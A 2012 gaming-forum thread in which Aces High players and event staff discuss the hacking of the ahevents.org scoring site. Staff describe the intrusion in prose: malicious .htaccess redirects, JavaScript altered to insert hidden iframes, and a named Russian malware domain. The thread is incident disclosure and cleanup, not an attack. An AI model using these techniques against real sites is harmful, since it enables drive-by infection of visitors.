Aces High Bulletin Board
Special Events Forums => Friday Squad Operations => Topic started by: UncleKurt on September 08, 2012, 12:25:30 AM
-
Please allow some patience waiting for the Leaning-Into-France Frame 1 Logs. We are experiencing some internet related access issues preventing the logs from being downloaded. We apologize for any inconvenience this may cause. Logs will be made available given the earliest opportunity.
:salute
-
So it's not just me having a problem with ahevents.org?
-
It would be a Pie-Rat waiting for the score :cheers:
-
According to google, ahevents.org has been the target of a cross site scripting attack generated from a web site in Russia.
Hope this helps.
-
It does look odd....best of luck CMs!
-
And I thought it was having problems adding up all my squads kills? Good luck with this on CM's and Kurt! Don't make me come down there again! Lol
Flifast
-
Diagnostic page for ahevents.org
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.
Of the 3 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time visited this site was on 2012-09-06, and the last time suspicious content was found on this site was on 2012-09-06.
Malicious software is hosted on 1 domain(s), including wayoseswindows.ru/.
This site was hosted on 1 network(s) including AS46606 (BLUEHOST).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, ahevents.org did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
The Commies! :old:
-
It would be a Pie-Rat waiting for the score :cheers:
Nothing wrong with the pie-rats :x
-
So what everyone is saying that frame 1 never really happend :bolt: :aok
-
God I hope not. That was a hella frame. :rock
-
So what everyone is saying that frame 1 never really happend :bolt: :aok
Oh it happened pal.
-
God I hope not. That was a hella frame. :rock
i had a blast. we were defending a base.......scanning for enemies, look down, and the sky is black with dots of enemy aircraft.
i'm anxious to see how it went.
-
Sorry I had to miss this one. Was in the infirmary with a stomach virus. :mad:
-
Anybody get ahold of Hitech over this issue yet?
-
Anybody get ahold of Hitech over this issue yet?
Hitech does not maintain the ahevents.org web site. It is maintained solely by the CM Team.
-
Its being looked at. Just have to be patient guys, its the internet and its many charms.
-
They are trying to get all our information. :O
-
CM team does a pretty bang up job for FSO and the website, its not to often that things get messed up like this. Hell this isn't even there fault.
-
The Commies! :old:
Time to Turn Russia into a BLOODY Crater :furious
EDIT: Now I am in a bad mood :uhoh
-
every since i tried to check the sites log I cant log into the game for more than 5 seconds before I lose connection. Any chance I got a virus from it?
-
Sorry I had to miss this one. Was in the infirmary with a stomach virus. :mad:
hope your better south. you missed a HELLUVA frame. totally vaped the Mossies.
-
hope your better south. you missed a HELLUVA frame. totally vaped the Mossies.
Mossies? who were you flying with?
-
Kurt, you uploaded the wrong logs.
-
Mossies? who were you flying with?
sorry meant Hurri's :bhead . was reliving a nightmare from MA last night :noid (got pounced by 2 mossies while flying the F4 lol.)
-
When I click onto the special events page I get something that says:
Jumla
this site is down for maintaince
then it wants me to log in and give my password. NOT GONNA HAPPEN!!!
This was this morning again, it was the same yesterday until last night then it was fixed, now it's back this!!! :salute
-
I 2nd what FBDragon said . . :bhead
Even though it was fixed last night for a while the logs for the other night weren't shown, sure hope we don't lose this log . . is there a chance we could lose this weeks log??? I hope we get to see them! :pray
-
In the CM's defense, there is a glaring problem and there is really only one person working on it. We are currently trying to find a short term work-around so the site will function so people can get the logs, but the issue isn't an easy fix.
The logs will not be lost by any means.
-
We have the raw logs from HTC. Those are run through a parser that generates the nice logs for you all over on AHevents.org. So the data is safe and not lossed the problem is over on AHevents.org. The site has been hacked and we are currently working on ripping out the stuff that has been inserted and also trying to secure the site from it being hit again. As Spikes said this is going to take some time but the raw data is safe.
-
:salute
CM staff.
I appreciate all that you do to make AH a better place.
-
Kudos to you guys do all this stuff :salute I know I couldn't do it!!!
-
and again I second FBDragon, thanks for the input and hope you succeed in fixing the hack :salute
-
Was the site hit on the 5th or the 6th, and is there an ETA on service restoration?
-
LOL :rofl sounds like somebody messed with the wrong person,and now they are coming back for revenge. :x
-
Not sure when it happened specifically but it was in the last several days.
No ETA as of yet since we are still trying to track down how they got in. Will update everybody when we have more news on the situation.
-
LOL :rofl sounds like somebody messed with the wrong person,and now they are coming back for revenge. :x
I fail to see the humor here. This problem has a negative effect not only on FSO logs but on all events running until the problem is fixed.
Thanks for keeping at it Ghostdancer Midi and Spikes. :aok
-
.
Thanks for keeping at it Ghostdancer Midi and Spikes. :aok
seconded. sounds like they're spending every moment of their spare time trying to solve this for us. :aok
-
Salute to those working out the hacking problem. Just a quick question...can someone from HTC post the logs on here until the site is restored? If not, then no big deal. Again, thanks all.
-
I will check with Shegotya and Squire about posting the logs here. They would be the raw logs and not pretty at all. You would be able to see who you shot down and types of object destroyed but that is about it.
Oh, and have I mention that I hate hackers.
-
Oh, and have I mention that I hate hackers.
who doesn't hate them
-
The logs are still there and there is a backup method to scoring the current frames if we have to do that. The data is there. So for now just concentrate on playing the frames and we will see where all this comes out. The September FSO will be scored.
-
well i for won LOVE hackers...it was a great movie,and angelina jolie is hot :rofl
-
:rolleyes:
-
Hey gents. Just my 2 cents... In my opinion (without access to your log files and other tools), it appears that the ahevents.org site is a launching platform for a cross site scripting attack. Here is how it works.
1. Bad guy in Russia hacked ahevents.org via some Web malware content (there are literally hundreds of ways to do this).
2. Now ahevents.org is a launching platform (for lack of better words) for attacks from the Russian site.
3. ahevents.org sits there waiting for a bunch of cartoon pilots to surf to it and check out their FSO scores
a. Cartoon pilot uses a Web browser to surf to ahevents.org
b. Once there, ahevents.org now exploits cartoon pilot's Web browser
c. Once that happens and depending upon how much security is on cartoon pilot's computer...
d. Malware is delivered from Russian site to cartoon pilot's computer
e. Russian dude now has your BoA password (assuming you bank with BoA) and all those nekkid pics of your wife :)
That's how it works. Best thing to do is reinstall ahevents.org from a known good back up.. Use a web scanner to scan it and go from there. Easier than flying a P38.
S1n1ster
-
Yep, they did two things:
1) They installed a mod_rewrite in the .htaccess file and then created additional .htaccess files in the various subdirectories (this causes anybody coming from Google, Bing, Yahoo, etc. search results to be redirect to the Russian site instead of getting to the events site).
2) Next they modified all the JavaScripts to write a hidden iframe on our pages which allows them to run a cross side scripting attack.
We have reinstalled the CMS from a clean backup and the database from a clean backup but it was reinfected (for lack of a better word) shortly after we did this. So basically we have been hunting down exploit / weakness / loop hole that they are using to get in and modify files. Once we track that down and close it up we should be good. Problem with this is just takes a bit of time to hunting down the issue and resolve it and then test to make sure it stays resolved.
-
Thank you, Ghostdancer, Spikes, and ForHIM for all the time and effort you folks have been putting into this! :salute
-
Big thank you should go to spikes here. He has put in some very, very, very long hours (basically anytime he is not working) hunting things down and working on this whole issue. I don't think the boy has gotten any sleep in a couple of days now.
-
Yep, they did two things:
1) They installed a mod_rewrite in the .htaccess file and then created additional .htaccess files in the various subdirectories (this causes anybody coming from Google, Bing, Yahoo, etc. search results to be redirect to the Russian site instead of getting to the events site).
2) Next they modified all the JavaScripts to write a hidden iframe on our pages which allows them to run a cross side scripting attack.
We have reinstalled the CMS from a clean backup and the database from a clean backup but it was reinfected (for lack of a better word) shortly after we did this. So basically we have been hunting down exploit / weakness / loop hole that they are using to get in and modify files. Once we track that down and close it up we should be good. Problem with this is just takes a bit of time to hunting down the issue and resolve it and then test to make sure it stays resolved.
Ghost, there are open source Web vulnerability scanners out there. It will make your work alot easier. Good luck and thanks for the hard work.
-
Site is back up. I just viewed the logs on the site, everything seems to be working fine.
-
Site is open, but we are waiting to see if a re-infection happens. It may go down at any time. Spikes and I have cleaned up what we could, patched and secured a number of items. There are a few more items to patch, but to do so would take the site offline for weeks as we update code for latest versions of the programs.
Please use caution on the web site. Until Chrome & Safari & Firefox drop the malware warning, be forewarned that it could still be a problem. Once we see the site is clean for a day or so, we'll request a review by the search engines to remove the blacklist we are currently on.
-
Site is open, but we are waiting to see if a re-infection happens. It may go down at any time. Spikes and I have cleaned up what we could, patched and secured a number of items. There are a few more items to patch, but to do so would take the site offline for weeks as we update code for latest versions of the programs.
Please use caution on the web site. Until Chrome & Safari & Firefox drop the malware warning, be forewarned that it could still be a problem. Once we see the site is clean for a day or so, we'll request a review by the search engines to remove the blacklist we are currently on.
THANK YOU GUYS!!!!!!
we know you all spent hours and hours of your valuable time getting this squared away for the community. :salute :aok
-
Big thank you should go to spikes here. He has put in some very, very, very long hours (basically anytime he is not working) hunting things down and working on this whole issue. I don't think the boy has gotten any sleep in a couple of days now.
Indeed, Spikes has been busting his hump to get this all sorted out. We all owe him a big salute.
:salute Spikes.
-
:salute spikes, great job :aok
-
:salute spikes, great job :aok
Seconded, Thirded, etc :rock :salute :aok
Thanks for spending your time for us!
-
Thanks for getting things back up :aok
:salute
BigRat
-
Well Done.
<S>
-
Shouldnt have taken you that long Spikes, jeez.
-
Outstanding work Spike and the gang! :aok :banana: :old: :rock Much appreciated! :cheers: :salute
-
:salute
Spikes
For all of your hard work. :cheers:
I appreciate it, as I'm sure many others do too. :aok
:salute
-
Thanks Gent's.
:salute
-
you guys are forgetting mrmidi, forhim, ghostdancer, and i think skuzzy too......and a couple others. they all worked their buttocks off. :salute
you guys rock!! :rock
-
Big Salute to All of the cm's who got the Site back up and running...........
<S>
Molsman
-
Thanks for all the efforts! :salute :cheers:
-
Well done and thank you to everyone that worked on this for us :salute